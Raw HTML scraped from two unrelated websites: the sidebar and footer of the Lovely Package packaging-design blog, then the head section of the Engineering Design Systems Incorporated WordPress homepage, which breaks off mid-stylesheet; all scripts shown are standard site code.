larger" href="http://lovelypackage.com/page/4/">4</a><a class="page larger" href="http://lovelypackage.com/page/5/">5</a><span class='extend'>...</span><a class="larger page" href="http://lovelypackage.com/page/10/">10</a><a class="larger page" href="http://lovelypackage.com/page/20/">20</a><a class="larger page" href="http://lovelypackage.com/page/30/">30</a><span class='extend'>...</span><a class="nextpostslink" rel="next" href="http://lovelypackage.com/page/2/">&raquo;</a><a class="last" href="http://lovelypackage.com/page/370/">Last &raquo;</a> </div> </div> <!-- begin l_sidebar --> <div id="l_sidebar"> <h2 class="hidden-text">Quick Navigation</h2> <ul> <li><a href="http://www.lovelypackage.com">1. Home</a> <li><a href="http://lovelypackage.com/advertise-on-lovely-package/">2. Advertise</a> <li><a href="mailto:[email protected]">3. Contact</a> </ul> <h2>Search</h2> <form id="searchform" method="get" action="/index.php"> <input type="text" name="s" id="s" size="23" /> </form> <h2>Follow Us</h2> <ul id="follow-list"> <li> <a href="http://www.facebook.com/pages/Lovely-Package/377462236656" target="_blank"><img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/facebook.jpg" alt="Facebook" /><span> Facebook</span></a> </li> <li> <a href="https://www.pinterest.com/lvlypckg/" target="_blank"><img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/pinterest.jpg" alt="Pinterest" /><span> Pinterest</span></a> </li> <li> <a href="http://twitter.com/LovelyPackage" target="_blank"><img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/twitter.jpg" alt="Twitter" /><span> Twitter</span></a> </li> <li> <a href="http://feeds2.feedburner.com/LovelyPackage" target="_blank"><img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/rss.jpg" alt="RSS Feed" /><span> RSS</span></a> </li> </ul> <br /> <br /> <ul> <li> <a href="http://www.lovelystationery.com/" target="_blank"> <img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/LS_visit.jpg" alt="Visit Lovely Stationery" /> </a> </li> </ul> <h2>Categories</h2> <ul> <li class="cat-item cat-item-19"><a href="http://lovelypackage.com/category/alcohol/" >Alcohol</a> </li> <li class="cat-item cat-item-328"><a href="http://lovelypackage.com/category/athletics/" >Athletics</a> </li> <li class="cat-item cat-item-406"><a href="http://lovelypackage.com/category/automotive/" >Automotive</a> </li> <li class="cat-item cat-item-20"><a href="http://lovelypackage.com/category/beverage/" >Beverage</a> </li> <li class="cat-item cat-item-52"><a href="http://lovelypackage.com/category/books/" >Books</a> </li> <li class="cat-item cat-item-135"><a href="http://lovelypackage.com/category/confectionery/" >Confectionery</a> </li> <li class="cat-item cat-item-153"><a href="http://lovelypackage.com/category/electronics/" >Electronics</a> </li> <li class="cat-item cat-item-158"><a href="http://lovelypackage.com/category/entertainment/" >Entertainment</a> </li> <li class="cat-item cat-item-61"><a href="http://lovelypackage.com/category/fashion/" >Fashion</a> </li> <li class="cat-item cat-item-32"><a href="http://lovelypackage.com/category/food/" >Food</a> </li> <li class="cat-item cat-item-29"><a href="http://lovelypackage.com/category/health-beauty/" >Health &amp; Beauty</a> </li> <li class="cat-item cat-item-77"><a href="http://lovelypackage.com/category/home/" >Home</a> </li> <li class="cat-item cat-item-145"><a href="http://lovelypackage.com/category/industrial/" >Industrial</a> </li> <li class="cat-item cat-item-683"><a href="http://lovelypackage.com/category/miscellaneous/" >Miscellaneous</a> </li> <li class="cat-item cat-item-25"><a href="http://lovelypackage.com/category/office/" >Office</a> </li> <li class="cat-item cat-item-355"><a href="http://lovelypackage.com/category/recreation/" >Recreation</a> </li> <li class="cat-item cat-item-331"><a href="http://lovelypackage.com/category/sports/" >Sports</a> </li> <li class="cat-item cat-item-143"><a href="http://lovelypackage.com/category/student-work/" >Student Work</a> </li> <li class="cat-item cat-item-144"><a href="http://lovelypackage.com/category/tobacco/" >Tobacco</a> </li> <li class="cat-item cat-item-609"><a href="http://lovelypackage.com/category/toys/" >Toys</a> </li> <li class="cat-item cat-item-1634"><a href="http://lovelypackage.com/category/vintage/" >Vintage</a> </li> </ul> <h2>Archives</h2> <ul> <li><a href='http://lovelypackage.com/2018/03/'>March 2018</a></li> <li><a href='http://lovelypackage.com/2018/02/'>February 2018</a></li> <li><a href='http://lovelypackage.com/2018/01/'>January 2018</a></li> <li><a href='http://lovelypackage.com/2016/03/'>March 2016</a></li> <li><a href='http://lovelypackage.com/2016/02/'>February 2016</a></li> <li><a href='http://lovelypackage.com/2016/01/'>January 2016</a></li> <li><a href='http://lovelypackage.com/2015/12/'>December 2015</a></li> <li><a href='http://lovelypackage.com/2015/11/'>November 2015</a></li> <li><a href='http://lovelypackage.com/2015/10/'>October 2015</a></li> <li><a href='http://lovelypackage.com/2015/09/'>September 2015</a></li> <li><a href='http://lovelypackage.com/2015/08/'>August 2015</a></li> <li><a href='http://lovelypackage.com/2015/07/'>July 2015</a></li> <li><a href='http://lovelypackage.com/2015/06/'>June 2015</a></li> <li><a href='http://lovelypackage.com/2015/05/'>May 2015</a></li> <li><a href='http://lovelypackage.com/2015/04/'>April 2015</a></li> <li><a href='http://lovelypackage.com/2015/03/'>March 2015</a></li> <li><a href='http://lovelypackage.com/2015/02/'>February 2015</a></li> <li><a href='http://lovelypackage.com/2015/01/'>January 2015</a></li> <li><a href='http://lovelypackage.com/2014/12/'>December 2014</a></li> <li><a href='http://lovelypackage.com/2014/11/'>November 2014</a></li> <li><a href='http://lovelypackage.com/2014/10/'>October 2014</a></li> <li><a href='http://lovelypackage.com/2014/09/'>September 2014</a></li> <li><a href='http://lovelypackage.com/2014/08/'>August 2014</a></li> <li><a href='http://lovelypackage.com/2014/07/'>July 2014</a></li> <li><a href='http://lovelypackage.com/2014/06/'>June 2014</a></li> <li><a href='http://lovelypackage.com/2014/05/'>May 2014</a></li> <li><a href='http://lovelypackage.com/2014/04/'>April 2014</a></li> <li><a href='http://lovelypackage.com/2014/03/'>March 2014</a></li> <li><a href='http://lovelypackage.com/2014/02/'>February 2014</a></li> <li><a href='http://lovelypackage.com/2014/01/'>January 2014</a></li> <li><a href='http://lovelypackage.com/2013/12/'>December 2013</a></li> <li><a href='http://lovelypackage.com/2013/11/'>November 2013</a></li> <li><a href='http://lovelypackage.com/2013/10/'>October 2013</a></li> <li><a href='http://lovelypackage.com/2013/09/'>September 2013</a></li> <li><a href='http://lovelypackage.com/2013/08/'>August 2013</a></li> <li><a href='http://lovelypackage.com/2013/07/'>July 2013</a></li> <li><a href='http://lovelypackage.com/2013/06/'>June 2013</a></li> <li><a href='http://lovelypackage.com/2013/05/'>May 2013</a></li> <li><a href='http://lovelypackage.com/2013/04/'>April 2013</a></li> <li><a href='http://lovelypackage.com/2013/03/'>March 2013</a></li> <li><a href='http://lovelypackage.com/2013/02/'>February 2013</a></li> <li><a href='http://lovelypackage.com/2013/01/'>January 2013</a></li> <li><a href='http://lovelypackage.com/2012/12/'>December 2012</a></li> <li><a href='http://lovelypackage.com/2012/11/'>November 2012</a></li> <li><a href='http://lovelypackage.com/2012/10/'>October 2012</a></li> <li><a href='http://lovelypackage.com/2012/09/'>September 2012</a></li> <li><a href='http://lovelypackage.com/2012/08/'>August 2012</a></li> <li><a href='http://lovelypackage.com/2012/07/'>July 2012</a></li> <li><a href='http://lovelypackage.com/2012/06/'>June 2012</a></li> <li><a href='http://lovelypackage.com/2012/05/'>May 2012</a></li> <li><a href='http://lovelypackage.com/2012/04/'>April 2012</a></li> <li><a href='http://lovelypackage.com/2012/03/'>March 2012</a></li> <li><a href='http://lovelypackage.com/2012/02/'>February 2012</a></li> <li><a href='http://lovelypackage.com/2012/01/'>January 2012</a></li> <li><a href='http://lovelypackage.com/2011/12/'>December 2011</a></li> <li><a href='http://lovelypackage.com/2011/11/'>November 2011</a></li> <li><a href='http://lovelypackage.com/2011/10/'>October 2011</a></li> <li><a href='http://lovelypackage.com/2011/09/'>September 2011</a></li> <li><a href='http://lovelypackage.com/2011/08/'>August 2011</a></li> <li><a href='http://lovelypackage.com/2011/07/'>July 2011</a></li> <li><a href='http://lovelypackage.com/2011/06/'>June 2011</a></li> <li><a href='http://lovelypackage.com/2011/05/'>May 2011</a></li> <li><a href='http://lovelypackage.com/2011/04/'>April 2011</a></li> <li><a href='http://lovelypackage.com/2011/03/'>March 2011</a></li> <li><a href='http://lovelypackage.com/2011/02/'>February 2011</a></li> <li><a href='http://lovelypackage.com/2011/01/'>January 2011</a></li> <li><a href='http://lovelypackage.com/2010/12/'>December 2010</a></li> <li><a href='http://lovelypackage.com/2010/11/'>November 2010</a></li> <li><a href='http://lovelypackage.com/2010/10/'>October 2010</a></li> <li><a href='http://lovelypackage.com/2010/09/'>September 2010</a></li> <li><a href='http://lovelypackage.com/2010/08/'>August 2010</a></li> <li><a href='http://lovelypackage.com/2010/07/'>July 2010</a></li> <li><a href='http://lovelypackage.com/2010/06/'>June 2010</a></li> <li><a href='http://lovelypackage.com/2010/05/'>May 2010</a></li> <li><a href='http://lovelypackage.com/2010/04/'>April 2010</a></li> <li><a href='http://lovelypackage.com/2010/03/'>March 2010</a></li> <li><a href='http://lovelypackage.com/2010/02/'>February 2010</a></li> <li><a href='http://lovelypackage.com/2010/01/'>January 2010</a></li> <li><a href='http://lovelypackage.com/2009/12/'>December 2009</a></li> <li><a href='http://lovelypackage.com/2009/11/'>November 2009</a></li> <li><a href='http://lovelypackage.com/2009/10/'>October 2009</a></li> <li><a href='http://lovelypackage.com/2009/09/'>September 2009</a></li> <li><a href='http://lovelypackage.com/2009/08/'>August 2009</a></li> <li><a href='http://lovelypackage.com/2009/07/'>July 2009</a></li> <li><a href='http://lovelypackage.com/2009/06/'>June 2009</a></li> <li><a href='http://lovelypackage.com/2009/05/'>May 2009</a></li> <li><a href='http://lovelypackage.com/2009/04/'>April 2009</a></li> <li><a href='http://lovelypackage.com/2009/03/'>March 2009</a></li> <li><a href='http://lovelypackage.com/2009/02/'>February 2009</a></li> <li><a href='http://lovelypackage.com/2009/01/'>January 2009</a></li> <li><a href='http://lovelypackage.com/2008/12/'>December 2008</a></li> <li><a href='http://lovelypackage.com/2008/11/'>November 2008</a></li> <li><a href='http://lovelypackage.com/2008/10/'>October 2008</a></li> <li><a href='http://lovelypackage.com/2008/09/'>September 2008</a></li> </ul> </div> <!-- begin r_sidebar --> <div id="r_sidebar"> <h2>Lovely Package</h2> <p>Curating the very best packaging design</p> <br /> </ul> <h2>Sponsors</h2> <ul> <li> <a href="https://refinepackaging.com/" target="_blank"><img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/refine_packaging.png" alt="Refine Packaging" /></a>Design your own <a href="https://refinepackaging.com/">custom boxes and packaging</a> with Refine Packaging. They produce custom packaging for Adidas, T-Mobile, Ticketmaster, Old Spice, MetLife, Pandora, and many other businesses nationwide. Contact them to get a free quote! <br /> <br /> <li> <!-- Either there are no banners, they are disabled or none qualified for this location! --> <!-- BuySellAds.com Zone Code --> <div id="bsap_1271240" class="bsarocks bsap_cda743cc773aefa17eb7170913bd758f"></div> <!-- End BuySellAds.com Zone Code --> <h2><a href="http://mediatemple.net/#a_aid=4e3c9eefd2e1e" target="_blank">Web Hosting</a></h2> <ul> <li> <a href="http://mediatemple.net/#a_aid=4e3c9eefd2e1e" target="_blank"><img src="http://lovelypackage.com/wp-content/themes/lp_elements-of-seo/images/mt_logo.jpg" alt="Media Temple Hosting" /></a> <li> <!-- BuySellAds Zone Code --> <div id="bsap_1294513" class="bsarocks bsap_cda743cc773aefa17eb7170913bd758f"></div> <!-- End BuySellAds Zone Code --> <li> </ul> </div></div> <!-- The main column ends --> </div> <!-- end wrap --> <!-- begin footer --> <div style="clear:both;"></div> <br /> <br /> <!-- BuySellAds.com Zone Code --> <div id="bsap_1271243" class="bsarocks bsap_cda743cc773aefa17eb7170913bd758f"></div> <!-- End BuySellAds.com Zone Code --> <div id="footer"> <p><a href="http://lovelypackage.com/">Home</a> / <a href="http://lovelypackage.com/advertise-on-lovely-package/">Advertise</a> / <a href="mailto:[email protected]">Contact</a> / <a href="http://www.facebook.com/pages/Lovely-Package/377462236656/">Facebook</a> / <a href="https://www.pinterest.com/lvlypckg/">Pinterest</a> / <a href="http://twitter.com/LovelyPackage/">Twitter</a> / <a href="http://feeds2.feedburner.com/LovelyPackage">RSS</a> / Hosting: <a href="http://mediatemple.net/#a_aid=4e3c9eefd2e1e">(mt) Media Temple</a><br />&copy; 2008-2019 Lovely Empire </p> </div> <br /> <script type='text/javascript' src='//assets.pinterest.com/js/pinit.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var click_object = {"ajax_url":"http:\/\/lovelypackage.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='http://lovelypackage.com/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script> <script type='text/javascript' src='http://lovelypackage.com/wp-includes/js/wp-embed.min.js?ver=ddeca9152fea46b7852d04f49926aaa8'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>Home - Engineering Design Systems Incorporated</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://www.edsi.com/xmlrpc.php" /> <title>Home - Engineering Design Systems Incorporated</title> <!-- This site is optimized with the Yoast SEO plugin v7.4.2 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://www.edsi.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - Engineering Design Systems Incorporated" /> <meta property="og:url" content="https://www.edsi.com/" /> <meta property="og:site_name" content="Engineering Design Systems Incorporated" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Home - Engineering Design Systems Incorporated" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.edsi.com\/","name":"Engineering Design Systems Incorporated","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.edsi.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//platform.twitter.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Engineering Design Systems Incorporated &raquo; Feed" href="https://www.edsi.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Engineering Design Systems Incorporated &raquo; Comments Feed" href="https://www.edsi.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Engineering Design Systems Incorporated &raquo; Home Comments Feed" href="https://www.edsi.com/home-5/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.edsi.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.edsi.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='fl-builder-layout-125-css' href='https://www.edsi.com/wp-content/uploads/bb-plugin/cache/125-layout.css?ver=ae645327eaa716dbfd2fb544a6fd91df' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.edsi.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3' type='text/css' media='all' /> <link rel='stylesheet' id='ditty-news-ticker-font-css' href='https://www.edsi.com/wp-content/plugins/ditty-news-ticker/assets/fontastic/styles.css?ver=2.0.18' type='text/css' media='all' /> <link rel='stylesheet' id='ditty-news-ticker-css' href='https://www.edsi.com/wp-content/plugins/ditty-news-ticker/assets/css/style.css?ver=2.0.18' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-galleries-font-css' href='https://www.edsi.com/wp-content/plugins/mtphr-galleries/assets/fontastic/styles.css?ver=1491230279' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-galleries-css' href='https://www.edsi.com/wp-content/plugins/mtphr-galleries/assets/css/style.css?ver=1491230279' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://www.edsi.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.6-78496d1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://www.edsi.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-members-css' href='https://www.edsi.com/wp-content/plugins/mtphr-members/assets/css/style.css?ver=1.1.9' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-tabs-css' href='https://www.edsi.com/wp-content/plugins/mtphr-shortcodes/assets/mtphr-tabs/mtphr-tabs.css?ver=2.2.8' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-shortcodes-font-css' href='https://www.edsi.com/wp-content/plugins/mtphr-shortcodes/assets/fontastic/styles.css?ver=2.2.8' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-shortcodes-css' href='https://www.edsi.com/wp-content/plugins/mtphr-shortcodes/assets/css/style.css?ver=2.2.8' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-widgets-font-css' href='https://www.edsi.com/wp-content/plugins/mtphr-widgets/assets/fontastic/styles.css?ver=2.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='mtphr-widgets-css' href='https://www.edsi.com/wp-content/plugins/mtphr-widgets/assets/css/style.css?ver=2.2.1' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/bootstrap/css/bootstrap.min.css?ver=1.1.23' type='text/css' media='all' /> <link rel='stylesheet' id='apex-font-css' href='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/fontastic/styles.css?ver=1.1.23' type='text/css' media='all' /> <link rel='stylesheet' id='animate-css' href='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/css/animate.min.css?ver=1.1.23' type='text/css' media='all' /> <link rel='stylesheet' id='apex-css' href='https://www.edsi.com/wp-content/themes/digitalscience-apex/style.css?ver=1.1.23' type='text/css' media='all' /> <link rel='stylesheet' id='ditty-image-ticker-css' href='https://www.edsi.com/wp-content/plugins/ditty-image-ticker/assets/css/style.css?ver=2.1.0' type='text/css' media='all' /> <link rel='stylesheet' id='ditty-posts-ticker-css' href='https://www.edsi.com/wp-content/plugins/ditty-posts-ticker/assets/css/style.css?ver=2.1.0' type='text/css' media='all' /> <link rel='stylesheet' id='ditty-twitter-ticker-css' href='https://www.edsi.com/wp-content/plugins/ditty-twitter-ticker/assets/css/style.css?ver=2.1.0' type='text/css' media='all' /> <script type='text/javascript' src='https://www.edsi.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.edsi.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://www.edsi.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://www.edsi.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.edsi.com/wp-content/themes/digitalscience-apex/assets/js/modernizr-2.6.2.min.js?ver=1.1.23'></script> <script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js?ver=1.1.23'></script> <link rel='https://api.w.org/' href='https://www.edsi.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.edsi.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.edsi.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://www.edsi.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.edsi.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.edsi.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.edsi.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.edsi.com%2F&#038;format=xml" /> <script type='text/javascript' data-cfasync='false'>var _mmunch = {'front': false, 'page': false, 'post': false, 'category': false, 'author': false, 'search': false, 'attachment': false, 'tag': false};_mmunch['front'] = true;_mmunch['page'] = true; _mmunch['pageData'] = {"ID":125,"post_name":"home-5","post_title":"Home","post_type":"page","post_author":"1","post_status":"publish"};</script><script data-cfasync="false" src="//a.mailmunch.co/app/v1/site.js" id="mailmunch-script" data-plugin="cc_mm" data-mailmunch-site-id="366595" async></script> <script type="text/javascript"> var ajaxurl = 'https://www.edsi.com/wp-admin/admin-ajax.php'; </script> <style id="apex-section-styles">#apex-page-133{background-color:#f1f7f7;}#apex-ditty_news_ticker-389{background-image:url(https://www.edsi.com/wp-content/uploads/2015/09/portfolio_large1.jpg);}#apex-page-123 .entry-content a,.no-touch #apex-page-123 a:hover,#apex-page-123 .apex-post-format-quote .entry-title,#apex-page-123 .apex-post-format-quote .entry-title a,#apex-page-123 .mtphr-dnt-post-format-quote .mtphr-dnt-posts-title,#apex-page-123 .mtphr-dnt-post-format-quote .mtphr-dnt-posts-title a,#apex-page-123 .entry-meta a,#apex-page-123 .entry-comments:hover i,#apex-page-123 .mtphr-rotator-footer a:hover i,#apex-page-123 .mtphr-posts-widget .readmore-wrapper a,#apex-page-123 .mtphr-tabbed-posts-widget .entry-meta,#apex-page-123 .search-container button[type="submit"]:hover,#apex-page-123 #wp-calendar td a,#apex-page-123 .mtphr-contact-widget a,#apex-page-123 .mtphr-comments-date,#apex-page-123 .mtphr-twitter-widget .mtphr-twitter-widget-date,#apex-page-123 .widget_recent_comments a,#apex-page-123 .widget_rss .rss-date,#apex-page-123 .mtphr-post-slider-header i,#apex-page-123 .entry-featured-data .entry-data,#apex-page-123 .entry-featured-icons a:hover i,#apex-page-123 .btn,#apex-page-123 .gform_button,#apex-page-123 .comment-reply-link,#apex-page-123 .form-submit input[type="submit"],#apex-page-123 .mtphr-gallery-header i,#apex-page-123 .widget_archive a:hover,#apex-page-123 .widget_categories a:hover,#apex-page-123 .mtphr-gallery-categories a:hover,#apex-page-123 .mtphr-post-navigation a:hover,#apex-page-123 .mtphr-comments-widget a:hover,#apex-page-123 .widget_pages a:hover,#apex-page-123 .widget_recent_entries a:hover,#apex-page-123 .widget_nav_menu a:hover,#apex-page-123 .widget_meta a:hover,#apex-page-123 .content-nav li a:hover,#apex-page-123 #comment-nav li a:hover,#apex-page-123 .paginate-links a:hover span.paginate-links-number,#apex-page-123 .apex-icon i,#apex-page-123 .apex-icon-round i,#apex-page-123 .apex-style-dark a.apex-icon-round:hover .apex-icon-title{color:#ffffff;}#apex-page-123 .entry-title a:hover,#apex-page-123 article.format-quote .entry-title,#apex-page-123 article.format-quote .entry-title a,#apex-page-123 .mtphr-dnt-post-format-quote .mtphr-dnt-posts-title,#apex-page-123 .mtphr-dnt-post-format-quote .mtphr-dnt-posts-title a,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-time,#apex-page-123 .apex-readmore,#apex-page-123 .apex-readmore *,#apex-page-123 article.format-quote .entry-title,#apex-page-123 article.format-quote .entry-title a,#apex-page-123.apex-post-format-quote .entry-title,#apex-page-123.apex-post-format-quote .entry-title a,#apex-page-123 .mtphr-dnt-post-format-quote .mtphr-dnt-posts-title,#apex-page-123 .mtphr-dnt-post-format-quote .mtphr-dnt-posts-title a,#apex-page-123 .mtphr-dnt-twitter-tick .mtphr-dnt-twitter-time{color:#ffffff !important;}#apex-page-123 .widget_archive a:hover span.count,#apex-page-123 .widget_categories a:hover span.count,#apex-page-123 .mtphr-gallery-categories a:hover span.count,#apex-page-123 #wp-calendar td#today,#apex-page-123 .mtphr-social-widget-site:hover i,#apex-page-123 .tagcloud a:hover,#apex-page-123 .mtphr-slide-graph-fill,#apex-page-123 .content-nav li span,#apex-page-123 #comment-nav li span,#apex-page-123 .paginate-links > span.paginate-links-number,#apex-page-123 a.apex-icon:hover i,#apex-page-123 a.apex-icon-round:hover .apex-icon,#apex-page-123 .btn:hover,#apex-page-123 .btn:active,#apex-page-123 .btn.active,#apex-page-123 .gform_button:hover,#apex-page-123 .gform_button:active,#apex-page-123 .gform_button.active,#apex-page-123 .gform_button:focus,#apex-page-123 .comment-reply-link:hover,#apex-page-123 .form-submit 